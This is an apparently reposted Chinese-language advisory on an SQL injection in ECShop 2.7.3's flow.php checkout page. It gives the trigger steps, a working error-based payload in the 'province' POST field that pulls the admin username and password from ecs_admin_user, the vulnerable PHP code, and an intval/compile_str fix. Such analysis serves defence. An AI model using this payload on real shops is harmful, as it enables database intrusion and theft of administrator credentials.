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ecshop /flow.php SQL Injection Vul

时间:2021-07-01 10:21:17 帮助过:2人阅读

. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考


1. 漏洞描述

ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞,攻击者可利用火狐tamper data等插件修改提交到配送地址页面的post数据,造成未授权的数据库操作甚至执行任意代码

Relevant Link:


2. 漏洞触发条件

1. 先注册账户,随便选个商品进购物车,然后填地址,电话等等
2. 把任意商品加入购物车在填写配送地址那一页,有地区选择
3. http://localhost/ecshop2.7.3/flow.php?step=consignee&direct_shopping=1
3. 其中POST数据如下
用firefox tamper data改成
localhost province=3) and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 # 
4. 就会回显错误页面了 

Relevant Link:


3. 漏洞影响范围
4. 漏洞代码分析


elseif ($_REQUEST[step] == consignee)
        * 保存收货人信息
        $consignee = array(
        address_id    => empty($_POST[address_id]) ? 0  : intval($_POST[address_id]),
        consignee     => empty($_POST[consignee])  ? ‘‘ : trim($_POST[consignee]),
        country       => empty($_POST[country])    ? ‘‘ : $_POST[country],
        province      => empty($_POST[province])   ? ‘‘ : $_POST[province],
        city          => empty($_POST[city])       ? ‘‘ : $_POST[city],
        district      => empty($_POST[district])   ? ‘‘ : $_POST[district],
        email         => empty($_POST[email])      ? ‘‘ : $_POST[email],
        address       => empty($_POST[address])    ? ‘‘ : $_POST[address],
        zipcode       => empty($_POST[zipcode])    ? ‘‘ : make_semiangle(trim($_POST[zipcode])),
        tel           => empty($_POST[tel])        ? ‘‘ : make_semiangle(trim($_POST[tel])),
        mobile        => empty($_POST[mobile])     ? ‘‘ : make_semiangle(trim($_POST[mobile])),
        sign_building => empty($_POST[sign_building]) ? ‘‘ : $_POST[sign_building],
        best_time     => empty($_POST[best_time])  ? ‘‘ : $_POST[best_time],

5. 防御方法


elseif ($_REQUEST[step] == consignee)
        * 保存收货人信息
        $consignee = array(
        /* 对用户输入的POST数据进行有效过滤 */
        address_id    => empty($_POST[address_id]) ? 0  :   intval($_POST[address_id]),
        consignee     => empty($_POST[consignee])  ? ‘‘ :   compile_str(trim($_POST[consignee])),
        country       => empty($_POST[country])    ? ‘‘ :   intval($_POST[country]),
        province      => empty($_POST[province])   ? ‘‘ :   intval($_POST[province]),
        city          => empty($_POST[city])       ? ‘‘ :   intval($_POST[city]),
        district      => empty($_POST[district])   ? ‘‘ :   intval($_POST[district]),
        /* */
        email         => empty($_POST[email])      ? ‘‘ :   compile_str($_POST[email]),
        address       => empty($_POST[address])    ? ‘‘ :   compile_str($_POST[address]),
        zipcode       => empty($_POST[zipcode])    ? ‘‘ :   compile_str(make_semiangle(trim($_POST[zipcode]))),
        tel           => empty($_POST[tel])        ? ‘‘ :   compile_str(make_semiangle(trim($_POST[tel]))),
        mobile        => empty($_POST[mobile])     ? ‘‘ :   compile_str(make_semiangle(trim($_POST[mobile]))),
        sign_building => empty($_POST[sign_building]) ? ‘‘ :compile_str($_POST[sign_building]),
        best_time     => empty($_POST[best_time])  ? ‘‘ :   compile_str($_POST[best_time]),

6. 攻防思考

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ecshop /flow.php SQL Injection Vul

